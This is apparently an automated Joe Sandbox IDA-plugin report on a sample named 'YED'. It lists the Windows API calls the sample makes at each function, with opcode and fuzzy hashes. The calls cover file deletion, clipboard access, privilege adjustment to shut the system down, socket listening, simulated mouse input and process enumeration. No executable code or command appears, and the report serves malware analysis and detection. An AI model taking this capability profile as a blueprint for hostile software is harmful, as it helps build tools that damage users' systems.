                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                • Opcode ID: ec834186ef073b227b9ff8d162f5016e21113984b9b21b18eaab3ce1f5daa090
                                                                                                                                                • Instruction ID: 898ad8c9159bcd1417db76adf9115c28ffd2b12cf9da9138a4ee90a821451c81
                                                                                                                                                • Opcode Fuzzy Hash: ec834186ef073b227b9ff8d162f5016e21113984b9b21b18eaab3ce1f5daa090
                                                                                                                                                • Instruction Fuzzy Hash: AA31B47652121A6BDB10AFB4EC0CAEE77AC9F4A320F184156E805E21D0EB30DD908B54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 002897BE
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00289819
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00289824
                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00289840
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00289890
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(002D6B7C), ref: 002898AE
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 002898B8
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 002898C5
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 002898D5
                                                                                                                                                  • Part of subcall function 0027DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0027DB00
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                • String ID: *.*
                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                • Opcode ID: 66ba20e1027f161f2b9710a1e03a5832a7fad76275368686edbd6c6804fbda08
                                                                                                                                                • Instruction ID: e66f2eafcb030a3f2aaca1957fea26586a33bc54d391b60e80aa37849f2e811f
                                                                                                                                                • Opcode Fuzzy Hash: 66ba20e1027f161f2b9710a1e03a5832a7fad76275368686edbd6c6804fbda08
                                                                                                                                                • Instruction Fuzzy Hash: 7731803551261B6BEF10AFA4EC48AEE77AC9F06324F284156E814A21D0DB70DEA4CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2
                                                                                                                                                  • Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0027D122
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0027D1DD
                                                                                                                                                • MoveFileW.KERNEL32 ref: 0027D1F0
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0027D20D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027D237
                                                                                                                                                  • Part of subcall function 0027D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 0027D2B2
                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 0027D253
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0027D264
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                • String ID: \*.*
                                                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                                                • Opcode ID: 9577f4b3683aa34deebdfd575dec9ed9e4140625f7f70513cbb766a9cf8026a5
                                                                                                                                                • Instruction ID: a54118f6fa08ef0dd937775ea9ceac2e33192f904335ae6911637aa506b30f2c
                                                                                                                                                • Opcode Fuzzy Hash: 9577f4b3683aa34deebdfd575dec9ed9e4140625f7f70513cbb766a9cf8026a5
                                                                                                                                                • Instruction Fuzzy Hash: DA617E3181114D9BCF05EFE0D9529EDB7B5AF25300F2480A5E80A77192EB316FA9CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                • Opcode ID: fe4c36a41a3c9f4c551ce1e6a17de686481ca3eb81cbade733e65bec24517a38
                                                                                                                                                • Instruction ID: ee774e7a52bb267f5f7e0f8970b8b6ad821fefea6faeeb7c4a6702f44f4c2862
                                                                                                                                                • Opcode Fuzzy Hash: fe4c36a41a3c9f4c551ce1e6a17de686481ca3eb81cbade733e65bec24517a38
                                                                                                                                                • Instruction Fuzzy Hash: F841CF79215612AFD710EF15E888F19BBE5EF45328F25C099E4158B6A2CB31EC52CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 002716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
                                                                                                                                                  • Part of subcall function 002716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
                                                                                                                                                  • Part of subcall function 002716C3: GetLastError.KERNEL32 ref: 0027174A
                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0027E932
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                • API String ID: 2234035333-3163812486
                                                                                                                                                • Opcode ID: f9bbe3c6180fe11c4a66285237b9542f8ec5dc38336df8c6388d13cba8211ada
                                                                                                                                                • Instruction ID: bab577856d3a057f208f49c66238a399c7c93df93a1defbd28cc152803e8e6aa
                                                                                                                                                • Opcode Fuzzy Hash: f9bbe3c6180fe11c4a66285237b9542f8ec5dc38336df8c6388d13cba8211ada
                                                                                                                                                • Instruction Fuzzy Hash: 4901DB73630211EBEF542674AC89BBB725C9B18750F168462FE06E21D1DAB05C6086B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00291276
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00291283
                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 002912BA
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 002912C5
                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 002912F4
                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00291303
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 0029130D
                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 0029133C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 540024437-0
                                                                                                                                                • Opcode ID: 6ce9a9f2e9f8300048b9d258b30cfbc99bb9c3ef3b3ada305ce8b08ef779e9c5
                                                                                                                                                • Instruction ID: 144c91d78e7858ed054b337d569a20ed7e9d946651188019e3134c7f2a5d8ab9
                                                                                                                                                • Opcode Fuzzy Hash: 6ce9a9f2e9f8300048b9d258b30cfbc99bb9c3ef3b3ada305ce8b08ef779e9c5
                                                                                                                                                • Instruction Fuzzy Hash: 1E419231A101129FDB10EF25D488B69BBF6BF46318F288198D8568F2D6C775EC91CBE1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2
                                                                                                                                                  • Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0027D420
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0027D470
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027D481
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0027D498
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0027D4A1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                • String ID: \*.*
                                                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                                                • Opcode ID: 5ed2d4b41462922e62828f6d403b0e069f2f5dc7f4e5d9bef222cad33d2c66c0
                                                                                                                                                • Instruction ID: 30605bab8f5b54346aa228b64d2e8fec828e5840bfacd42620055cdb5d7f8659
                                                                                                                                                • Opcode Fuzzy Hash: 5ed2d4b41462922e62828f6d403b0e069f2f5dc7f4e5d9bef222cad33d2c66c0
                                                                                                                                                • Instruction Fuzzy Hash: 573192710283459BC300EF64D8658EF77E8BEA2310F44891DF4D552191EB30AA59DB63
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                • Opcode ID: 6ed72740656227169ae0293a133a3de193c6c532380852a36dd952860dd02c6f
                                                                                                                                                • Instruction ID: b6ff2753abe119c877b8b54b1dbaa8569ebfe60bed8149c4f7c14885a5937232
                                                                                                                                                • Opcode Fuzzy Hash: 6ed72740656227169ae0293a133a3de193c6c532380852a36dd952860dd02c6f
                                                                                                                                                • Instruction Fuzzy Hash: 63C23872E246298FDF69CE289D407EAB7B5FB84304F1541EAD84DE7240E774AE918F40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 002864DC
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00286639
                                                                                                                                                • CoCreateInstance.OLE32(002AFCF8,00000000,00000001,002AFB68,?), ref: 00286650
                                                                                                                                                • CoUninitialize.OLE32 ref: 002868D4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                • String ID: .lnk
                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                • Opcode ID: 10f5b545aac0385c55835d68f96627a8810c109774c6463e03850aaf915e7639
                                                                                                                                                • Instruction ID: 8ca658d1ac5b6533b271f2ed024eb0b2f1bcd3f95d267cd2ce7628ed07c458d8
                                                                                                                                                • Opcode Fuzzy Hash: 10f5b545aac0385c55835d68f96627a8810c109774c6463e03850aaf915e7639
                                                                                                                                                • Instruction Fuzzy Hash: C3D17975528301AFC310EF24C8859ABB7E8FF98304F50496DF5958B2A1EB30ED59CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetForegroundWindow.USER32 ref: 002922E8
                                                                                                                                                  • Part of subcall function 0028E4EC: GetWindowRect.USER32(?,?), ref: 0028E504
                                                                                                                                                • GetDesktopWindow.USER32 ref: 00292312
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00292319
                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00292355
                                                                                                                                                • GetCursorPos.USER32(?), ref: 00292381
                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002923DF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2387181109-0
                                                                                                                                                • Opcode ID: e630619076ddf0237c2e4a92532b1fa9b20cf2bc5229e0a70a8997f0dbcdc198
                                                                                                                                                • Instruction ID: 92d820f0d036a023c4dcc5da5dbe189f259cc3d27733111442d398955f1ec852
                                                                                                                                                • Opcode Fuzzy Hash: e630619076ddf0237c2e4a92532b1fa9b20cf2bc5229e0a70a8997f0dbcdc198
                                                                                                                                                • Instruction Fuzzy Hash: 67310072504306AFDB20DF14DC09B5BBBADFF88310F100919F988A7181DB34EA18CB96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0029304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
                                                                                                                                                  • Part of subcall function 0029304E: _wcslen.LIBCMT ref: 0029309B
                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0029185D
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00291884
                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 002918DB
                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 002918E6
                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00291915
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1601658205-0
                                                                                                                                                • Opcode ID: 1188f56b3dce7620b8590e9539d5105563f02a2672fafec472f29d647be5bc9e
                                                                                                                                                • Instruction ID: 705ca92d50a9ba48dd23a800e0d489c1e8c94aac3178949849dd17955b047ac8
                                                                                                                                                • Opcode Fuzzy Hash: 1188f56b3dce7620b8590e9539d5105563f02a2672fafec472f29d647be5bc9e
                                                                                                                                                • Instruction Fuzzy Hash: AE51E375A10210AFEB10AF24D88AF6AB7E5AF44718F148098F9155F3D3CB71ED61CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                • API String ID: 0-1546025612
                                                                                                                                                • Opcode ID: 4435246b69d78788ac4040c38a2ac2c11d740a8ec452b57b5d4d55799c83ff20
                                                                                                                                                • Instruction ID: 9ff60f7a1cb02dc6ed5bf0175705a5daeba9c298f70dd20d45cd25dad75036fa
                                                                                                                                                • Opcode Fuzzy Hash: 4435246b69d78788ac4040c38a2ac2c11d740a8ec452b57b5d4d55799c83ff20
                                                                                                                                                • Instruction Fuzzy Hash: 80A2BF70E2021ACBDF24CF58C8947EDB3B1BB64311F64819AEC15A7284EB709DE5CB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002782AA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen
                                                                                                                                                • String ID: ($tb-$|
                                                                                                                                                • API String ID: 1659193697-4172324640
                                                                                                                                                • Opcode ID: b325e608aa6245695f12f3721deb41936c917b243e4765a7b34c0b0e4321fa4c
                                                                                                                                                • Instruction ID: 9f0eac93659cb08195943896d1b28ce548a3453ab843949e769010ad8c030c90
                                                                                                                                                • Opcode Fuzzy Hash: b325e608aa6245695f12f3721deb41936c917b243e4765a7b34c0b0e4321fa4c
                                                                                                                                                • Instruction Fuzzy Hash: 34324774A107069FCB28CF59C08596AB7F0FF48710B15C56EE49ADB7A1EB70E951CB40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0029A6AC
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0029A6BA
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0029A79C
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029A7AB
                                                                                                                                                  • Part of subcall function 0022CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00253303,?), ref: 0022CE8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1991900642-0
